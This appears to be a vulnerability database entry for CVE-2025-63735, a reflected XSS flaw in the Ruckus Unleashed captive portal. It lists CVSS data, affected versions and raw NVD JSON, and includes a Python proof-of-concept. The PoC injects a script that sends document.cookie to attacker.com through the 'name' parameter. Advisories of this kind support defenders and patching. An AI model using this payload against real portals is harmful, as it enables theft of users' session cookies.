Security Vulnerability Report
中文
CVE-2025-63735 CVSS 6.1 MEDIUM

CVE-2025-63735

Published: 2025-11-25 22:15:48
Last Modified: 2026-01-09 02:22:16

Description

A reflected Cross site scripting (XSS) vulnerability in Ruckus Unleashed 200.13.6.1.319 via the name parameter to the the captive-portal endpoint selfguestpass/guestAccessSubmit.jsp.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ruckuswireless:ruckus_unleashed:200.13.6.1.319:*:*:*:*:*:*:* - VULNERABLE
Ruckus Unleashed <= 200.13.6.1.319

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-63735 PoC - Ruckus Unleashed Reflected XSS # Target: Ruckus Unleashed <= 200.13.6.1.319 def exploit_xss(target_url): """ Exploit for reflected XSS in selfguestpass/guestAccessSubmit.jsp The 'name' parameter is vulnerable to reflected XSS """ # Malicious payload - extracts session cookies xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' # Construct the malicious URL endpoint = '/selfguestpass/guestAccessSubmit.jsp' params = { 'name': xss_payload, 'email': '[email protected]', 'company': 'Test' } full_url = target_url.rstrip('/') + endpoint print(f'[+] Target URL: {full_url}') print(f'[+] Payload: {xss_payload}') try: response = requests.get(full_url, params=params, timeout=10) if xss_payload in response.text: print('[+] XSS payload reflected in response - Vulnerability confirmed!') return True else: print('[-] XSS payload not found in response') return False except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') return False if __name__ == '__main__': # Example usage target = 'http://192.168.1.1' exploit_xss(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63735", "sourceIdentifier": "[email protected]", "published": "2025-11-25T22:15:47.860", "lastModified": "2026-01-09T02:22:16.383", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected Cross site scripting (XSS) vulnerability in Ruckus Unleashed 200.13.6.1.319 via the name parameter to the the captive-portal endpoint selfguestpass/guestAccessSubmit.jsp."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruckuswireless:ruckus_unleashed:200.13.6.1.319:*:*:*:*:*:*:*", "matchCriteriaId": "79F0365A-C883-4808-9737-7A51070EA59C"}]}]}], "references": [{"url": "https://github.com/huthx/CVE-2025-63735-Ruckus-Unleashed-Reflected-XSS", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.ruckusnetworks.com/products/network-control-and-management/controller-less/", "source": "[email protected]", "tags": ["Product"]}]}}